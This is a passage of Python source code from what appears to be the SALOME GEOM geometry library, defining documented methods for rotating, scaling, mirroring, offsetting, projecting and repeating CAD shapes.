def MakeRotation(self, theObject, theAxis, theAngle, theName=None):
"""
Rotate the given object around the given axis
on the given angle, creating its copy before the rotatation.
Parameters:
theObject The object to be rotated.
theAxis Rotation axis.
theAngle Rotation angle in radians.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the rotated object.
"""
# Example: see GEOM_TestAll.py
flag = False
if isinstance(theAngle,str):
flag = True
theAngle, Parameters = ParseParameters(theAngle)
if flag:
theAngle = theAngle*math.pi/180.0
anObj = self.TrsfOp.RotateCopy(theObject, theAxis, theAngle)
RaiseIfFailed("RotateCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "rotated")
return anObj
## Rotate given object around vector perpendicular to plane
# containing three points.
# @param theObject The object to be rotated.
# @param theCentPoint central point the axis is the vector perpendicular to the plane
# containing the three points.
# @param thePoint1,thePoint2 points in a perpendicular plane of the axis.
# @param theCopy Flag used to rotate object itself or create a copy.
# @return Rotated @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the rotated object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def RotateThreePoints(self, theObject, theCentPoint, thePoint1, thePoint2, theCopy=False):
"""
Rotate given object around vector perpendicular to plane
containing three points.
Parameters:
theObject The object to be rotated.
theCentPoint central point the axis is the vector perpendicular to the plane
containing the three points.
thePoint1,thePoint2 points in a perpendicular plane of the axis.
theCopy Flag used to rotate object itself or create a copy.
Returns:
Rotated theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the rotated object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.RotateThreePointsCopy(theObject, theCentPoint, thePoint1, thePoint2)
else:
anObj = self.TrsfOp.RotateThreePoints(theObject, theCentPoint, thePoint1, thePoint2)
RaiseIfFailed("RotateThreePoints", self.TrsfOp)
return anObj
## Rotate given object around vector perpendicular to plane
# containing three points, creating its copy before the rotatation.
# @param theObject The object to be rotated.
# @param theCentPoint central point the axis is the vector perpendicular to the plane
# containing the three points.
# @param thePoint1,thePoint2 in a perpendicular plane of the axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the rotated object.
#
# @ref tui_rotation "Example"
@ManageTransactions("TrsfOp")
def MakeRotationThreePoints(self, theObject, theCentPoint, thePoint1, thePoint2, theName=None):
"""
Rotate given object around vector perpendicular to plane
containing three points, creating its copy before the rotatation.
Parameters:
theObject The object to be rotated.
theCentPoint central point the axis is the vector perpendicular to the plane
containing the three points.
thePoint1,thePoint2 in a perpendicular plane of the axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the rotated object.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.RotateThreePointsCopy(theObject, theCentPoint, thePoint1, thePoint2)
RaiseIfFailed("RotateThreePointsCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "rotated")
return anObj
## Scale the given object by the specified factor.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
# Passing None for it means scaling relatively the origin of global CS.
# @param theFactor Scaling factor value.
# @param theCopy Flag used to scale object itself or create a copy.
# @return Scaled @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the scaled object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Scale(self, theObject, thePoint, theFactor, theCopy=False):
"""
Scale the given object by the specified factor.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
Passing None for it means scaling relatively the origin of global CS.
theFactor Scaling factor value.
theCopy Flag used to scale object itself or create a copy.
Returns:
Scaled theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the scaled object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theFactor, Parameters = ParseParameters(theFactor)
if theCopy:
anObj = self.TrsfOp.ScaleShapeCopy(theObject, thePoint, theFactor)
else:
anObj = self.TrsfOp.ScaleShape(theObject, thePoint, theFactor)
RaiseIfFailed("Scale", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Scale the given object by the factor, creating its copy before the scaling.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
# Passing None for it means scaling relatively the origin of global CS.
# @param theFactor Scaling factor value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the scaled shape.
#
# @ref tui_scale "Example"
@ManageTransactions("TrsfOp")
def MakeScaleTransform(self, theObject, thePoint, theFactor, theName=None):
"""
Scale the given object by the factor, creating its copy before the scaling.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
Passing None for it means scaling relatively the origin of global CS.
theFactor Scaling factor value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the scaled shape.
"""
# Example: see GEOM_TestAll.py
theFactor, Parameters = ParseParameters(theFactor)
anObj = self.TrsfOp.ScaleShapeCopy(theObject, thePoint, theFactor)
RaiseIfFailed("ScaleShapeCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "scaled")
return anObj
## Scale the given object by different factors along coordinate axes.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
# Passing None for it means scaling relatively the origin of global CS.
# @param theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
# @param theCopy Flag used to scale object itself or create a copy.
# @return Scaled @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the scaled object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def ScaleAlongAxes(self, theObject, thePoint, theFactorX, theFactorY, theFactorZ, theCopy=False):
"""
Scale the given object by different factors along coordinate axes.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
Passing None for it means scaling relatively the origin of global CS.
theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
theCopy Flag used to scale object itself or create a copy.
Returns:
Scaled theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the scaled object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
theFactorX, theFactorY, theFactorZ, Parameters = ParseParameters(theFactorX, theFactorY, theFactorZ)
if theCopy:
anObj = self.TrsfOp.ScaleShapeAlongAxesCopy(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
else:
anObj = self.TrsfOp.ScaleShapeAlongAxes(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
RaiseIfFailed("ScaleAlongAxes", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Scale the given object by different factors along coordinate axes,
# creating its copy before the scaling.
# @param theObject The object to be scaled.
# @param thePoint Center point for scaling.
# Passing None for it means scaling relatively the origin of global CS.
# @param theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the scaled shape.
#
# @ref swig_scale "Example"
@ManageTransactions("TrsfOp")
def MakeScaleAlongAxes(self, theObject, thePoint, theFactorX, theFactorY, theFactorZ, theName=None):
"""
Scale the given object by different factors along coordinate axes,
creating its copy before the scaling.
Parameters:
theObject The object to be scaled.
thePoint Center point for scaling.
Passing None for it means scaling relatively the origin of global CS.
theFactorX,theFactorY,theFactorZ Scaling factors along each axis.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the scaled shape.
"""
# Example: see GEOM_TestAll.py
theFactorX, theFactorY, theFactorZ, Parameters = ParseParameters(theFactorX, theFactorY, theFactorZ)
anObj = self.TrsfOp.ScaleShapeAlongAxesCopy(theObject, thePoint,
theFactorX, theFactorY, theFactorZ)
RaiseIfFailed("MakeScaleAlongAxes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "scaled")
return anObj
## Mirror an object relatively the given plane.
# @param theObject The object to be mirrored.
# @param thePlane Plane of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByPlane(self, theObject, thePlane, theCopy=False):
"""
Mirror an object relatively the given plane.
Parameters:
theObject The object to be mirrored.
thePlane Plane of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.MirrorPlaneCopy(theObject, thePlane)
else:
anObj = self.TrsfOp.MirrorPlane(theObject, thePlane)
RaiseIfFailed("MirrorByPlane", self.TrsfOp)
return anObj
## Create an object, symmetrical
# to the given one relatively the given plane.
# @param theObject The object to be mirrored.
# @param thePlane Plane of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByPlane(self, theObject, thePlane, theName=None):
"""
Create an object, symmetrical to the given one relatively the given plane.
Parameters:
theObject The object to be mirrored.
thePlane Plane of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorPlaneCopy(theObject, thePlane)
RaiseIfFailed("MirrorPlaneCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
## Mirror an object relatively the given axis.
# @param theObject The object to be mirrored.
# @param theAxis Axis of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByAxis(self, theObject, theAxis, theCopy=False):
"""
Mirror an object relatively the given axis.
Parameters:
theObject The object to be mirrored.
theAxis Axis of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
"""
if theCopy:
anObj = self.TrsfOp.MirrorAxisCopy(theObject, theAxis)
else:
anObj = self.TrsfOp.MirrorAxis(theObject, theAxis)
RaiseIfFailed("MirrorByAxis", self.TrsfOp)
return anObj
## Create an object, symmetrical
# to the given one relatively the given axis.
# @param theObject The object to be mirrored.
# @param theAxis Axis of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByAxis(self, theObject, theAxis, theName=None):
"""
Create an object, symmetrical to the given one relatively the given axis.
Parameters:
theObject The object to be mirrored.
theAxis Axis of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorAxisCopy(theObject, theAxis)
RaiseIfFailed("MirrorAxisCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
## Mirror an object relatively the given point.
# @param theObject The object to be mirrored.
# @param thePoint Point of symmetry.
# @param theCopy Flag used to mirror object itself or create a copy.
# @return Mirrored @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the mirrored object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def MirrorByPoint(self, theObject, thePoint, theCopy=False):
"""
Mirror an object relatively the given point.
Parameters:
theObject The object to be mirrored.
thePoint Point of symmetry.
theCopy Flag used to mirror object itself or create a copy.
Returns:
Mirrored theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the mirrored object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
if theCopy:
anObj = self.TrsfOp.MirrorPointCopy(theObject, thePoint)
else:
anObj = self.TrsfOp.MirrorPoint(theObject, thePoint)
RaiseIfFailed("MirrorByPoint", self.TrsfOp)
return anObj
## Create an object, symmetrical
# to the given one relatively the given point.
# @param theObject The object to be mirrored.
# @param thePoint Point of symmetry.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the mirrored shape.
#
# @ref tui_mirror "Example"
@ManageTransactions("TrsfOp")
def MakeMirrorByPoint(self, theObject, thePoint, theName=None):
"""
Create an object, symmetrical
to the given one relatively the given point.
Parameters:
theObject The object to be mirrored.
thePoint Point of symmetry.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the mirrored shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.MirrorPointCopy(theObject, thePoint)
RaiseIfFailed("MirrorPointCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "mirrored")
return anObj
## Modify the location of the given object.
# @param theObject The object to be displaced.
# @param theStartLCS Coordinate system to perform displacement from it.\n
# If \a theStartLCS is NULL, displacement
# will be performed from global CS.\n
# If \a theObject itself is used as \a theStartLCS,
# its location will be changed to \a theEndLCS.
# @param theEndLCS Coordinate system to perform displacement to it.
# @param theCopy Flag used to displace object itself or create a copy.
# @return Displaced @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the displaced object if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Position(self, theObject, theStartLCS, theEndLCS, theCopy=False):
"""
Modify the Location of the given object by LCS, creating its copy before the setting.
Parameters:
theObject The object to be displaced.
theStartLCS Coordinate system to perform displacement from it.
If theStartLCS is NULL, displacement
will be performed from global CS.
If theObject itself is used as theStartLCS,
its location will be changed to theEndLCS.
theEndLCS Coordinate system to perform displacement to it.
theCopy Flag used to displace object itself or create a copy.
Returns:
Displaced theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the displaced object if theCopy flag is True.
"""
# Example: see GEOM_TestAll.py
if theCopy:
anObj = self.TrsfOp.PositionShapeCopy(theObject, theStartLCS, theEndLCS)
else:
anObj = self.TrsfOp.PositionShape(theObject, theStartLCS, theEndLCS)
RaiseIfFailed("Displace", self.TrsfOp)
return anObj
## Modify the Location of the given object by LCS,
# creating its copy before the setting.
# @param theObject The object to be displaced.
# @param theStartLCS Coordinate system to perform displacement from it.\n
# If \a theStartLCS is NULL, displacement
# will be performed from global CS.\n
# If \a theObject itself is used as \a theStartLCS,
# its location will be changed to \a theEndLCS.
# @param theEndLCS Coordinate system to perform displacement to it.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the displaced shape.
#
# @ref tui_modify_location "Example"
@ManageTransactions("TrsfOp")
def MakePosition(self, theObject, theStartLCS, theEndLCS, theName=None):
"""
Modify the Location of the given object by LCS, creating its copy before the setting.
Parameters:
theObject The object to be displaced.
theStartLCS Coordinate system to perform displacement from it.
If theStartLCS is NULL, displacement
will be performed from global CS.
If theObject itself is used as theStartLCS,
its location will be changed to theEndLCS.
theEndLCS Coordinate system to perform displacement to it.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the displaced shape.
Example of usage:
# create local coordinate systems
cs1 = geompy.MakeMarker( 0, 0, 0, 1,0,0, 0,1,0)
cs2 = geompy.MakeMarker(30,40,40, 1,0,0, 0,1,0)
# modify the location of the given object
position = geompy.MakePosition(cylinder, cs1, cs2)
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionShapeCopy(theObject, theStartLCS, theEndLCS)
RaiseIfFailed("PositionShapeCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "displaced")
return anObj
## Modify the Location of the given object by Path.
# @param theObject The object to be displaced.
# @param thePath Wire or Edge along that the object will be translated.
# @param theDistance progress of Path (0 = start location, 1 = end of path location).
# @param theCopy is to create a copy objects if true.
# @param theReverse 0 - for usual direction, 1 - to reverse path direction.
# @return Displaced @a theObject (GEOM.GEOM_Object) if @a theCopy is @c False or
# new GEOM.GEOM_Object, containing the displaced shape if @a theCopy is @c True.
#
# @ref tui_modify_location "Example"
@ManageTransactions("TrsfOp")
def PositionAlongPath(self,theObject, thePath, theDistance, theCopy, theReverse):
"""
Modify the Location of the given object by Path.
Parameters:
theObject The object to be displaced.
thePath Wire or Edge along that the object will be translated.
theDistance progress of Path (0 = start location, 1 = end of path location).
theCopy is to create a copy objects if true.
theReverse 0 - for usual direction, 1 - to reverse path direction.
Returns:
Displaced theObject (GEOM.GEOM_Object) if theCopy is False or
new GEOM.GEOM_Object, containing the displaced shape if theCopy is True.
Example of usage:
position = geompy.PositionAlongPath(cylinder, circle, 0.75, 1, 1)
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionAlongPath(theObject, thePath, theDistance, theCopy, theReverse)
RaiseIfFailed("PositionAlongPath", self.TrsfOp)
return anObj
## Modify the Location of the given object by Path, creating its copy before the operation.
# @param theObject The object to be displaced.
# @param thePath Wire or Edge along that the object will be translated.
# @param theDistance progress of Path (0 = start location, 1 = end of path location).
# @param theReverse 0 - for usual direction, 1 - to reverse path direction.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the displaced shape.
@ManageTransactions("TrsfOp")
def MakePositionAlongPath(self, theObject, thePath, theDistance, theReverse, theName=None):
"""
Modify the Location of the given object by Path, creating its copy before the operation.
Parameters:
theObject The object to be displaced.
thePath Wire or Edge along that the object will be translated.
theDistance progress of Path (0 = start location, 1 = end of path location).
theReverse 0 - for usual direction, 1 - to reverse path direction.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the displaced shape.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.PositionAlongPath(theObject, thePath, theDistance, 1, theReverse)
RaiseIfFailed("PositionAlongPath", self.TrsfOp)
self._autoPublish(anObj, theName, "displaced")
return anObj
## Offset given shape.
# @param theObject The base object for the offset.
# @param theOffset Offset value.
# @param theCopy Flag used to offset object itself or create a copy.
# @return Modified @a theObject (GEOM.GEOM_Object) if @a theCopy flag is @c False (default) or
# new GEOM.GEOM_Object, containing the result of offset operation if @a theCopy flag is @c True.
@ManageTransactions("TrsfOp")
def Offset(self, theObject, theOffset, theCopy=False):
"""
Offset given shape.
Parameters:
theObject The base object for the offset.
theOffset Offset value.
theCopy Flag used to offset object itself or create a copy.
Returns:
Modified theObject (GEOM.GEOM_Object) if theCopy flag is False (default) or
new GEOM.GEOM_Object, containing the result of offset operation if theCopy flag is True.
"""
theOffset, Parameters = ParseParameters(theOffset)
if theCopy:
anObj = self.TrsfOp.OffsetShapeCopy(theObject, theOffset)
else:
anObj = self.TrsfOp.OffsetShape(theObject, theOffset)
RaiseIfFailed("Offset", self.TrsfOp)
anObj.SetParameters(Parameters)
return anObj
## Create new object as offset of the given one.
# @param theObject The base object for the offset.
# @param theOffset Offset value.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the offset object.
#
# @ref tui_offset "Example"
@ManageTransactions("TrsfOp")
def MakeOffset(self, theObject, theOffset, theName=None):
"""
Create new object as offset of the given one.
Parameters:
theObject The base object for the offset.
theOffset Offset value.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the offset object.
Example of usage:
box = geompy.MakeBox(20, 20, 20, 200, 200, 200)
# create a new object as offset of the given object
offset = geompy.MakeOffset(box, 70.)
"""
# Example: see GEOM_TestAll.py
theOffset, Parameters = ParseParameters(theOffset)
anObj = self.TrsfOp.OffsetShapeCopy(theObject, theOffset)
RaiseIfFailed("OffsetShapeCopy", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "offset")
return anObj
## Create new object as projection of the given one on a 2D surface.
# @param theSource The source object for the projection. It can be a point, edge or wire.
# @param theTarget The target object. It can be planar or cylindrical face.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing the projection.
#
# @ref tui_projection "Example"
@ManageTransactions("TrsfOp")
def MakeProjection(self, theSource, theTarget, theName=None):
"""
Create new object as projection of the given one on a 2D surface.
Parameters:
theSource The source object for the projection. It can be a point, edge or wire.
theTarget The target object. It can be planar or cylindrical face.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing the projection.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.ProjectShapeCopy(theSource, theTarget)
RaiseIfFailed("ProjectShapeCopy", self.TrsfOp)
self._autoPublish(anObj, theName, "projection")
return anObj
## Create a projection projection of the given point on a wire or an edge.
# If there are no solutions or there are 2 or more solutions It throws an
# exception.
# @param thePoint the point to be projected.
# @param theWire the wire. The edge is accepted as well.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return [\a u, \a PointOnEdge, \a EdgeInWireIndex]
# \n \a u: The parameter of projection point on edge.
# \n \a PointOnEdge: The projection point.
# \n \a EdgeInWireIndex: The index of an edge in a wire.
#
# @ref tui_projection "Example"
@ManageTransactions("TrsfOp")
def MakeProjectionOnWire(self, thePoint, theWire, theName=None):
"""
Create a projection projection of the given point on a wire or an edge.
If there are no solutions or there are 2 or more solutions It throws an
exception.
Parameters:
thePoint the point to be projected.
theWire the wire. The edge is accepted as well.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
[u, PointOnEdge, EdgeInWireIndex]
u: The parameter of projection point on edge.
PointOnEdge: The projection point.
EdgeInWireIndex: The index of an edge in a wire.
"""
# Example: see GEOM_TestAll.py
anObj = self.TrsfOp.ProjectPointOnWire(thePoint, theWire)
RaiseIfFailed("ProjectPointOnWire", self.TrsfOp)
self._autoPublish(anObj[1], theName, "projection")
return anObj
# -----------------------------------------------------------------------------
# Patterns
# -----------------------------------------------------------------------------
## Translate the given object along the given vector a given number times
# @param theObject The object to be translated.
# @param theVector Direction of the translation. DX if None.
# @param theStep Distance to translate on.
# @param theNbTimes Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all
# the shapes, obtained after each translation.
#
# @ref tui_multi_translation "Example"
@ManageTransactions("TrsfOp")
def MakeMultiTranslation1D(self, theObject, theVector, theStep, theNbTimes, theName=None):
"""
Translate the given object along the given vector a given number times
Parameters:
theObject The object to be translated.
theVector Direction of the translation. DX if None.
theStep Distance to translate on.
theNbTimes Quantity of translations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all
the shapes, obtained after each translation.
Example of usage:
r1d = geompy.MakeMultiTranslation1D(prism, vect, 20, 4)
"""
# Example: see GEOM_TestAll.py
theStep, theNbTimes, Parameters = ParseParameters(theStep, theNbTimes)
anObj = self.TrsfOp.MultiTranslate1D(theObject, theVector, theStep, theNbTimes)
RaiseIfFailed("MultiTranslate1D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multitranslation")
return anObj
## Conseqently apply two specified translations to theObject specified number of times.
# @param theObject The object to be translated.
# @param theVector1 Direction of the first translation. DX if None.
# @param theStep1 Step of the first translation.
# @param theNbTimes1 Quantity of translations to be done along theVector1.
# @param theVector2 Direction of the second translation. DY if None.
# @param theStep2 Step of the second translation.
# @param theNbTimes2 Quantity of translations to be done along theVector2.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all
# the shapes, obtained after each translation.
#
# @ref tui_multi_translation "Example"
@ManageTransactions("TrsfOp")
def MakeMultiTranslation2D(self, theObject, theVector1, theStep1, theNbTimes1,
theVector2, theStep2, theNbTimes2, theName=None):
"""
Conseqently apply two specified translations to theObject specified number of times.
Parameters:
theObject The object to be translated.
theVector1 Direction of the first translation. DX if None.
theStep1 Step of the first translation.
theNbTimes1 Quantity of translations to be done along theVector1.
theVector2 Direction of the second translation. DY if None.
theStep2 Step of the second translation.
theNbTimes2 Quantity of translations to be done along theVector2.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all
the shapes, obtained after each translation.
Example of usage:
tr2d = geompy.MakeMultiTranslation2D(prism, vect1, 20, 4, vect2, 80, 3)
"""
# Example: see GEOM_TestAll.py
theStep1,theNbTimes1,theStep2,theNbTimes2, Parameters = ParseParameters(theStep1,theNbTimes1,theStep2,theNbTimes2)
anObj = self.TrsfOp.MultiTranslate2D(theObject, theVector1, theStep1, theNbTimes1,
theVector2, theStep2, theNbTimes2)
RaiseIfFailed("MultiTranslate2D", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multitranslation")
return anObj
## Rotate the given object around the given axis a given number times.
# Rotation angle will be 2*PI/theNbTimes.
# @param theObject The object to be rotated.
# @param theAxis The rotation axis. DZ if None.
# @param theNbTimes Quantity of rotations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each rotation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate1DNbTimes (self, theObject, theAxis, theNbTimes, theName=None):
"""
Rotate the given object around the given axis a given number times.
Rotation angle will be 2*PI/theNbTimes.
Parameters:
theObject The object to be rotated.
theAxis The rotation axis. DZ if None.
theNbTimes Quantity of rotations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each rotation.
Example of usage:
rot1d = geompy.MultiRotate1DNbTimes(prism, vect, 4)
"""
# Example: see GEOM_TestAll.py
theNbTimes, Parameters = ParseParameters(theNbTimes)
anObj = self.TrsfOp.MultiRotate1D(theObject, theAxis, theNbTimes)
RaiseIfFailed("MultiRotate1DNbTimes", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the given axis
# a given number times on the given angle.
# @param theObject The object to be rotated.
# @param theAxis The rotation axis. DZ if None.
# @param theAngleStep Rotation angle in radians.
# @param theNbTimes Quantity of rotations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
# shapes, obtained after each rotation.
#
# @ref tui_multi_rotation "Example"
@ManageTransactions("TrsfOp")
def MultiRotate1DByStep(self, theObject, theAxis, theAngleStep, theNbTimes, theName=None):
"""
Rotate the given object around the given axis
a given number times on the given angle.
Parameters:
theObject The object to be rotated.
theAxis The rotation axis. DZ if None.
theAngleStep Rotation angle in radians.
theNbTimes Quantity of rotations to be done.
theName Object name; when specified, this parameter is used
for result publication in the study. Otherwise, if automatic
publication is switched on, default value is used for result name.
Returns:
New GEOM.GEOM_Object, containing compound of all the
shapes, obtained after each rotation.
Example of usage:
rot1d = geompy.MultiRotate1DByStep(prism, vect, math.pi/4, 4)
"""
# Example: see GEOM_TestAll.py
theAngleStep, theNbTimes, Parameters = ParseParameters(theAngleStep, theNbTimes)
anObj = self.TrsfOp.MultiRotate1DByStep(theObject, theAxis, theAngleStep, theNbTimes)
RaiseIfFailed("MultiRotate1DByStep", self.TrsfOp)
anObj.SetParameters(Parameters)
self._autoPublish(anObj, theName, "multirotation")
return anObj
## Rotate the given object around the given axis a given
# number times and multi-translate each rotation result.
# Rotation angle will be 2*PI/theNbTimes1.
# Translation direction passes through center of gravity
# of rotated shape and its projection on the rotation axis.
# @param theObject The object to be rotated.
# @param theAxis Rotation axis. DZ if None.
# @param theNbTimes1 Quantity of rotations to be done.
# @param theRadialStep Translation distance.
# @param theNbTimes2 Quantity of translations to be done.
# @param theName Object name; when specified, this parameter is used
# for result publication in the study. Otherwise, if automatic
# publication is switched on, default value is used for result name.
#
# @return New GEOM.GEOM_Object, containing compound of all the
